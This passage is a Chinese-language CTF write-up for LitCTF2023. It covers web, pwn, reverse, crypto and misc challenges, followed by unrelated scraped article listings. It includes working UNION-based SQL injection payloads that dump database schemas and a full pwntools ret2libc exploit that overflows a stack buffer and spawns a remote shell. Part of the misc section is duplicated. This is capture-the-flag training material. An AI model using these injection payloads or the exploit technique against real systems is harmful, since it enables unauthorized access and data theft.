​ 发现给了一句源码:


$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';$result = $conn->query($sql);

​ 由于前半部分存在多个(,因此后边需要对括号进行闭合,之后和寻常的sql注入一样:

​ 查数据库:

?id=1))))))union select 1,group_concat(schema_name) from information_schema.schemata--+

​ 查表:

?id=1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+

​ 查字段名:

?id=1))))))union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining'--+

​ 查flag:NSSCTF{d97bb244-e6e7-4ee9-b764-2a28571532e5}

?id=1))))))union select 1,flag from ctftraining.flag--+

11、Flag点击就送!

​ 随便输入一个1,之后提示只有管理员能进,应该是Cookie伪造,那么看一下Cookie,

session=eyJuYW1lIjoiMSJ9.Zmbx8g.9zpH8poegrPcOfauIe1GtO1ht64

​ 应该是session伪造,猜测key为LitCTF,修改1为admin,最后拿到flag:NSSCTF{fdbe1619-9458-4e89-84fa-6e9b308e5507}

Pwn:

1、只需要nc一下~

​ 呜呜呜,这个题我竟然懵逼了,最后发现是在环境变量中 (>_<)。

​ 直接nc之后echo $FLAG即可获得flag:NSSCTF{548baafa-2de1-41c7-aafe-29b90be4f940}

2、口算题卡

​ nc连接之后发现是一个加减法运算(?)

root@MSI:/mnt/c/Users/20820/Downloads# nc node4.anna.nssctf.cn 28007__           ________      _________   ______       _________   ______
/_/\         /_______/\    /________/\ /_____/\     /________/\ /_____/\
\:\ \        \__.::._\/    \__.::.__\/ \:::__\/     \__.::.__\/ \::::_\/_\:\ \          \::\ \        \::\ \    \:\ \  __      \::\ \    \:\/___/\\:\ \____     _\::\ \__      \::\ \    \:\ \/_/\      \::\ \    \:::._\/\:\/___/\   /__\::\__/\      \::\ \    \:\_\ \ \      \::\ \    \:\ \\_____\___________________   \__\_____ \_____\______  \__\/     \_\//_____/\     /_____/\     /_____/\     /_____/\\:::_:\ \    \:::_ \ \    \:::_:\ \    \:::_:\ \_\:\|     \:\ \ \ \       _\:\|       /_\:\ \_______     /::_/__     \:\ \ \ \     /::_/__      \::_:\ \
/______/\    \:\____/\    \:\_\ \ \    \:\____/\    /___\:\ '
\__::::\/     \_____\/     \_____\/     \_____\/    \______/Welcome to the LitCTF2023 Verbal Problem Card!
You will be presented with 100 addition and subtraction problems.
Your goal is to answer all of them correctly to get the flag!
if you wrong, you will be kicked out of the game.
Good luck & Have fun!

​ 推测需要加减到一定数目才会出flag,试试吧,exp如下:

from pwn import *io = remote("node4.anna.nssctf.cn",28007)io.recvuntil(b"Have fun!\n")for i in range(100):io.recvuntil(b"What is")key = io.recvuntil(b"?")payload = flat([str(eval(key[:-1]))])print(eval(key[:-1]))io.sendline(payload)io.interactive()

​ 最后得到flag:Congratulations! Here’s your flag:NSSCTF{757d9dc8-d946-4f97-9370-63876e41aeaf}

3、狠狠的溢出涅~

​ 检查保护:

root@MSI:/mnt/c/Users/20820/Downloads/ubuntu_pwn# checksec pwn4
[*] '/mnt/c/Users/20820/Downloads/ubuntu_pwn/pwn4'Arch:     amd64-64-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x400000)

​ IDA 反编译;

int __fastcall main(int argc, const char **argv, const char **envp)
{char buf[91]; // [rsp+10h] [rbp-60h] BYREFunsigned __int8 v5; // [rsp+6Bh] [rbp-5h]int v6; // [rsp+6Ch] [rbp-4h]v6 = 0;setbuf(stdin, 0LL);setbuf(stdout, 0LL);setbuf(stderr, 0LL);puts("Leave your message:");read(0, buf, 0x200uLL);v5 = strlen(buf);if ( v5 > 0x50u ){puts("hacker");exit(0);}puts("Ok,Message Received");return 0;
}

​ 发现存在栈溢出漏洞,但是,也存在过滤,就是获取buf的大小,然后与0x50u进行大小比较,没有后门函数,那么就是个ret2libc,直接套公式做了。

​ 先通过puts函数泄露puts函数本身的真实地址,之后通过libc文件或者LibcSearcher库查版本拿system和/bin/sh的地址,exp如下:

from pwn import *context (os='linux', arch='amd64', log_level='debug')
context.terminal = ['tmux','splitw','-h','-l','140']pwnfile = './pwn4'
elf = ELF(pwnfile)
libc = ELF('./libc-2.31.so')#io = process(pwnfile)
io = remote('node4.anna.nssctf.cn',28607)#gdb.attach(io)pop_rdi = 0x4007d3
pop_ret = 0x400556
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x4006B0
pay = b'\x00' * (0x60+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter('message:\n', pay)puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search('/bin/sh\x00'))
pay2 = b'\x00' * (0x68) + p64(pop_ret) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
io.recvuntil("message:")
io.sendline(pay2)io.interactive()

​ flag:NSSCTF{u_r_master_of_stackoverflow_and_intoverflow}

Re:

1、世界上最棒的程序员

​ shift+f12直接找到flag:Flag: LitCTF{I_am_the_best_programmer_ever}

2、ez_XOR:

​ 直接上源码:

int __cdecl main(int argc, const char **argv, const char **envp)
{int v4; // [esp+0h] [ebp-80h]const char **v5; // [esp+4h] [ebp-7Ch]const char **v6; // [esp+8h] [ebp-78h]char Str1[50]; // [esp+1Ch] [ebp-64h] BYREFchar Str2[26]; // [esp+4Eh] [ebp-32h] BYREF__int16 v9; // [esp+68h] [ebp-18h]int v10; // [esp+6Ah] [ebp-16h]int v11; // [esp+6Eh] [ebp-12h]int v12; // [esp+72h] [ebp-Eh]int v13; // [esp+76h] [ebp-Ah]int v14; // [esp+7Ah] [ebp-6h]__int16 v15; // [esp+7Eh] [ebp-2h]__main();strcpy(Str2, "E`}J]OrQF[V8zV:hzpV}fVF[t");v9 = 0;v10 = 0;v11 = 0;v12 = 0;v13 = 0;v14 = 0;v15 = 0;printf("Enter The Right FLAG:");scanf("%s", Str1);XOR(Str1, 3);if ( !strcmp(Str1, Str2) ){printf("U Saved IT!\n");return 0;}else{printf("Wrong!Try again!\n");return main(v4, v5, v6);}
}

​ XOR函数如下:

size_t __cdecl XOR(char *Str, char a2)
{size_t result; // eaxunsigned int i; // [esp+2Ch] [ebp-Ch]for ( i = 0; ; ++i ){result = strlen(Str);if ( i >= result )break;Str[i] ^= 3 * a2;}return result;
}

​ 那么,大致可以知道了,E`}J]OrQF[V8zV:hzpV}fVF[t字段与9进行异或运算,所以,可以写出如下exp:

a = "E`}J]OrQF[V8zV:hzpV}fVF[t"
b = ""
for i in a:c = ord(i) ^ 9b += chr(c)
print(b)

​ flag:LitCTF{XOR_1s_3asy_to_OR}

3、enbase64

​ 打断点动态调试一下。然后就能看到source:gJ1BRjQie/FIWhEslq7GxbnL26M4+HXUtcpmVTKaydOP38of5v90ZSwrkYzCAuND

​ 解码即可,再看basecheck(Str1)中有str1的值,然后base64解码即可:

​ flag:LitCTF{B@5E64_l5_tooo0_E3sy!!!}

Crypto:

1、梦想是红色的 (初级)

自由友善公正公正敬业法治自由自由和谐平等自由自由公正法治诚信民主诚信自由自由诚信民主爱国友善平等诚信富强友善爱国自由诚信民主敬业爱国诚信民主友善爱国平等爱国爱国敬业敬业友善爱国公正敬业爱国敬业和谐文明诚信文明友善爱国自由诚信民主爱国爱国诚信和谐友善爱国自由友善平等爱国友善平等友善自由诚信自由平等爱国爱国敬业敬业友善爱国敬业敬业友善自由友善平等诚信自由法治诚信和谐

​ 一眼社会主义核心价值观加密,无脑梭:LitCTF{为之则易,不为则难}

2、Hex?Hex!(初级)

4c69744354467b746169313131636f6f6c6c616161217d

​ 提示hex了,无脑十六进制解密:LitCTF{tai111coollaaa!}

3、你是我的关键词(Keyworld) (初级)

IFRURC{X0S_YP3_JX_HBXV0PA}

​ 关键字加密,key是YOU,提示很明显:LITCTF{Y0U_AR3_MY_KEYW0RD}

4、家人们!谁懂啊,RSA签到都不会 (初级)

from Crypto.Util.number import *
from secret import flagm = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
e = 65537
n = p*q
c = pow(m,e,n)
print(f'p = {p}')
print(f'q = {q}')
print(f'c = {c}')
'''
p = 12567387145159119014524309071236701639759988903138784984758783651292440613056150667165602473478042486784826835732833001151645545259394365039352263846276073
q = 12716692565364681652614824033831497167911028027478195947187437474380470205859949692107216740030921664273595734808349540612759651241456765149114895216695451
c = 108691165922055382844520116328228845767222921196922506468663428855093343772017986225285637996980678749662049989519029385165514816621011058462841314243727826941569954125384522233795629521155389745713798246071907492365062512521474965012924607857440577856404307124237116387085337087671914959900909379028727767057
'''

​ 大佬直接用工具一把梭GitHub - spmonkey/Crypto 直接工具直接解密即可,我不知为啥下载不了这个工具,所以直接上答案了:

​ flag:LitCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}

Misc;

1、What_1s_BASE (初级)

TGl0Q1RGe0tGQ19DcjR6eV9UaHVyM2RheV9WX21lXzUwfQ==

​ 直接base64解码即可:LitCTF{KFC_Cr4zy_Thur3day_V_me_50}

2、404notfound (初级)

​ 一张图片,记事本打开,前几行有flag:LitCTF{Its_404_but_1ts_n0t_a_page}

3、这羽毛球怎么只有一半啊(恼 (初级)

​ 拖到010里修改高度,之后得到flag:LitCTF{Fl4g_0fcourse!}

4、喜欢我的压缩包么 (初级)

​ 提示压缩包密码是6位数字,直接爆破解出密码是114514,好臭的密码:LitCTF{Do-u-like-my-zip-p4ck?}

5、Take me hand (初级)

​ 流量包分析,随便追踪一个http,在请求的POST数据中找到flag,经过url解码之后得到:LitCTF{Give_y0ur_hand_to_me!!!_plz}

6、破损的图片(初级)

​ 文件用010editor编辑,添上%png…,也就是89504E470D0A1A0A,再将图片重命名为.png图片,打开图片便是flag:LitCTF{May you, the beauty of this world, always shine.}

7、Osint小麦果汁

​ 我tm,想暴打出题人,算了,忍忍。

​ 上面看到一个很明显的字符,看起来像是wifi名,hacker&craft,直接在百度地图搜索黑客,发现了一个名字,黑客与精酿,flag:LitCTF{黑客与精酿}

8、easy_shark

​ 又是个欺负我010有问题,真服了,想暴打出题人。

​ 还是说下思路就行了吧,拖进010,修改 90 00 为 00 00即可,然后不用密码解压,追踪http流,在多个http流中找到了一个php一句话木马,然后再找,第五十几个就能找到个方程,然后两个key,应该是仿射密码,以及#后面是一个字符串,格式很想flag。之后仿射密码解决:LitCTF{w13e5hake_1s_a_900d_t3a771c_t001_a}

9、OSINT 探姬去哪了?_0

​ 又是社工 (T^T):

otfound (初级)

​ 一张图片,记事本打开,前几行有flag:LitCTF{Its_404_but_1ts_n0t_a_page}

3、这羽毛球怎么只有一半啊(恼 (初级)

​ 拖到010里修改高度,之后得到flag:LitCTF{Fl4g_0fcourse!}

4、喜欢我的压缩包么 (初级)

​ 提示压缩包密码是6位数字,直接爆破解出密码是114514,好臭的密码:LitCTF{Do-u-like-my-zip-p4ck?}

5、Take me hand (初级)

​ 流量包分析,随便追踪一个http,在请求的POST数据中找到flag,经过url解码之后得到:LitCTF{Give_y0ur_hand_to_me!!!_plz}

6、破损的图片(初级)

​ 文件用010editor编辑,添上%png…,也就是89504E470D0A1A0A,再将图片重命名为.png图片,打开图片便是flag:LitCTF{May you, the beauty of this world, always shine.}

7、Osint小麦果汁

​ 我tm,想暴打出题人,算了,忍忍。

​ 上面看到一个很明显的字符,看起来像是wifi名,hacker&craft,直接在百度地图搜索黑客,发现了一个名字,黑客与精酿,flag:LitCTF{黑客与精酿}

8、easy_shark

​ 又是个欺负我010有问题,真服了,想暴打出题人。

​ 还是说下思路就行了吧,拖进010,修改 90 00 为 00 00即可,然后不用密码解压,追踪http流,在多个http流中找到了一个php一句话木马,然后再找,第五十几个就能找到个方程,然后两个key,应该是仿射密码,以及#后面是一个字符串,格式很想flag。之后仿射密码解决:LitCTF{w13e5hake_1s_a_900d_t3a771c_t001_a}

9、OSINT 探姬去哪了?_0

​ 又是社工 (T^T):

​ 根据属性中的经纬度找到了一个地方,嘉兴市秀洲区,然后高德地图搜索"嘉兴市秀洲区 电信",出现的是电信大厦,所以:LitCTF{中国电信大厦}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/25978.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

SQL159 每个创作者每月的涨粉率及截止当前的总粉丝量

SQL159 每个创作者每月的涨粉率及截止当前的总粉丝量

描述 用户-视频互动表tb_user_video_log iduidvideo_idstart_timeend_timeif_followif_likeif_retweetcomment_id110120012021-09-01 10:00:002021-09-01 10:00:20011NULL210520022021-09-10 11:00:002021-09-10 11:00:30101NULL310120012021-10-01 10:00:002021-10-01 10:00…
阅读更多...
RAG检索与生成的融合

RAG检索与生成的融合

1、rag定义 检索增强生成 (RAG) 模型代表了检索系统和生成模型两大不同但互补组件完美结合的杰作。通过无缝整合相关信息检索和生成与背景相关的响应&#xff0c;RAG模型在人工智能领域达到了前所未有的复杂程度。 2、rag工作流程 2.1、rag整体框架 query通过llm处理后&…
阅读更多...
3.haproxy负载均衡

3.haproxy负载均衡

haproxy负载均衡 一、haproxy介绍1、负载均衡类型 二、haproxy配置文件1、backend2、frontend 三、haproxy实现MySQL负载均衡 —— 4层1、后端两台MySQL配置双主复制2、安装配置haproxy2.1 安装软件2.2 编辑配置2.3 启动haproxy2.4 测试通过haproxy正常连接MySQL 四、haproxy实…
阅读更多...
张大哥笔记:从古至今,赚钱最快的路子就一个,从未改变

张大哥笔记:从古至今,赚钱最快的路子就一个,从未改变

从古至今&#xff0c;赚钱最快的路子就一个&#xff0c;而且从未改变&#xff0c;那就是信息差&#xff01; 不要误解信息差为某种高端复杂的概念&#xff1b;其本质很简单——它就是"你知道而别人不知道的信息"。 曾经我也认为&#xff0c;随着互联网的发展&#x…
阅读更多...
Android.基本用法学习笔记

Android.基本用法学习笔记

设置文本的内容 先在strings.xml声明变量 方法1. 方法2. 设置文本的大小 1.单位dp&#xff0c;大家可以去学一下有关的单位换算 2. 设置文本颜色 1. 2. 4.设置文本背景颜色 1. 2. 设置视图的宽高 与上级视图一致&#xff0c;也就是上一级有多宽就有多少 1. 2. 3. 4. 设置视图…
阅读更多...
【全网最简单的解决办法】vscode中点击运行出现仅当从 VS 开发人员命令提示符处运行 VS Code 时,cl.exe 生成和调试才可用

【全网最简单的解决办法】vscode中点击运行出现仅当从 VS 开发人员命令提示符处运行 VS Code 时,cl.exe 生成和调试才可用

首先确保你是否下载好了gcc编译器&#xff01;&#xff01;&#xff01; 检测方法&#xff1a; winR 打开cmd命令窗 输入where gcc(如果出现路径则说明gcc配置好啦&#xff01;) where gcc 然后打开我们的vscode 把这个文件删除掉 再次点击运行代码&#xff0c;第一个出现…
阅读更多...
【C语言】C语言—通讯录管理系统(源码)【独一无二】

【C语言】C语言—通讯录管理系统(源码)【独一无二】

&#x1f449;博__主&#x1f448;&#xff1a;米码收割机 &#x1f449;技__能&#x1f448;&#xff1a;C/Python语言 &#x1f449;公众号&#x1f448;&#xff1a;测试开发自动化【获取源码商业合作】 &#x1f449;荣__誉&#x1f448;&#xff1a;阿里云博客专家博主、5…
阅读更多...
AI日报0610 -- Prompt这样改,AI成本瞬降20%!

AI日报0610 -- Prompt这样改,AI成本瞬降20%!

全球首届人工智能选美大赛 世界 AI 创作者大赛和创作者平台 FanVue 正在举办首届“Miss AI”大赛 超过 1,500 名 AI 生成的模特竞逐。这些模型不仅形象逼真 还展示了不同的个性和原因。 评委将评估技术和吸引观众的能力。 奖金池高达 20,000 美元&#xff0c;并有机会参加公关…
阅读更多...
【python】python化妆品销售logistic逻辑回归预测分析可视化(源码+课程论文+数据集)【独一无二】

【python】python化妆品销售logistic逻辑回归预测分析可视化(源码+课程论文+数据集)【独一无二】

&#x1f449;博__主&#x1f448;&#xff1a;米码收割机 &#x1f449;技__能&#x1f448;&#xff1a;C/Python语言 &#x1f449;公众号&#x1f448;&#xff1a;测试开发自动化【获取源码商业合作】 &#x1f449;荣__誉&#x1f448;&#xff1a;阿里云博客专家博主、5…
阅读更多...
已解决Error || IndexError: index 3 is out of bounds for axis 0 with size 3

已解决Error || IndexError: index 3 is out of bounds for axis 0 with size 3

已解决Error || IndexError: index 3 is out of bounds for axis 0 with size 3 原创作者&#xff1a; 猫头虎 作者微信号&#xff1a; Libin9iOak 作者公众号&#xff1a; 猫头虎技术团队 更新日期&#xff1a; 2024年6月6日 博主猫头虎的技术世界 &#x1f31f; 欢迎来…
阅读更多...
11. MySQL 备份、恢复

11. MySQL 备份、恢复

文章目录 【 1. MySQL 备份类型 】【 2. 备份数据库 mysqldump 】2.1 备份单个数据表2.2 备份多个数据库2.3 备份所有数据库2.4 备份文件解析 【 3. 恢复数据库 mysql 】【 4. 导出表数据 OUTFILE 】【 5. 恢复表数据 INFILE 】 问题背景 尽管采取了一些管理措施来保证数据库的…
阅读更多...
33-unittest数据驱动(ddt)

33-unittest数据驱动(ddt)

所谓数据驱动&#xff0c;是指利用不同的测试数据来测试相同的场景。为了提高代码的重用性&#xff0c;增加代码效率而采用一种代码编写的方法&#xff0c;叫数据驱动&#xff0c;也就是参数化。达到测试数据和测试业务相分离的效果。 比如登录这个功能&#xff0c;操…
阅读更多...
大模型基础——从零实现一个Transformer(2)

大模型基础——从零实现一个Transformer(2)

大模型基础——从零实现一个Transformer(1) 一、引言 上一章主要实现了一下Transformer里面的BPE算法和 Embedding模块定义 本章主要讲一下 Transformer里面的位置编码以及多头注意力 二、位置编码 2.1正弦位置编码(Sinusoidal Position Encoding) 其中&#xff1a; pos&…
阅读更多...
线程知识点总结

线程知识点总结

Java线程是Java并发编程中的核心概念之一&#xff0c;它允许程序同时执行多个任务。以下是关于Java线程的一些关键知识点总结&#xff1a; 1. 线程的创建与启动 继承Thread类&#xff1a;创建一个新的类继承Thread类&#xff0c;并重写其run()方法。通过创建该类的实例并调用st…
阅读更多...
从信号灯到泊车位,ARMxy如何重塑城市交通智能化

从信号灯到泊车位,ARMxy如何重塑城市交通智能化

城市智能交通系统的高效运行对于缓解交通拥堵、提高出行安全及优化城市管理至关重要。ARMxy工业计算机&#xff0c;作为这一领域内的技术先锋&#xff0c;正以其强大的性能和灵活性&#xff0c;悄然推动着交通管理的智能化升级。 智能信号控制的精细化管理 想象一下&#xff0…
阅读更多...
【C语言】11.字符函数和字符串函数

【C语言】11.字符函数和字符串函数

文章目录 1.字符分类函数2.字符转换函数3.strlen的使用和模拟实现4.strcpy的使用和模拟实现5.strcat的使用和模拟实现6.strcmp的使用和模拟实现7.strncpy函数的使用8.strncat函数的使用9.strncmp函数的使用10.strstr的使用和模拟实现11.strtok函数的使用12.strerror函数的使用 …
阅读更多...
视频修复工具,模糊视频变清晰!

视频修复工具,模糊视频变清晰!

老旧视频画面效果差&#xff0c;视频效果模糊。我们经常找不到一个好的工具来让视频更清晰&#xff0c;并把它变成高清画质。相信很多网友都会有这个需求&#xff0c;尤其是视频剪辑行业的网友&#xff0c;经常会遇到这个问题。今天给大家分享一个可以把模糊视频修复清晰的工具…
阅读更多...
cnvd_2015_07557-redis未授权访问rce漏洞复现-vulfocus复现

cnvd_2015_07557-redis未授权访问rce漏洞复现-vulfocus复现

1.复现环境与工具 环境是在vulfocus上面 工具&#xff1a;GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module 参考攻击使用方式与原理&#xff1a;https://vulhub.org/#/environments/redis/4-unacc/ 2.复现 需要一个外网的服务器做&…
阅读更多...
《TCP/IP网络编程》(第十四章)多播与广播

《TCP/IP网络编程》(第十四章)多播与广播

当需要向多个用户发送多媒体信息时&#xff0c;如果使用TCP套接字&#xff0c;则需要维护与用户数量相等的套接字&#xff1b;如果使用之前学习的UDP&#xff0c;传输次数也需要和用户数量相同。 所以为了解决这些问题&#xff0c;可以采用多播和广播技术&#xff0c;这样只需要…
阅读更多...
Python学习打卡:day02

Python学习打卡:day02

day2 笔记来源于&#xff1a;黑马程序员python教程&#xff0c;8天python从入门到精通&#xff0c;学python看这套就够了 8、字符串的三种定义方式 字符串在Python中有多种定义形式 单引号定义法&#xff1a; name 黑马程序员双引号定义法&#xff1a; name "黑马程序…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023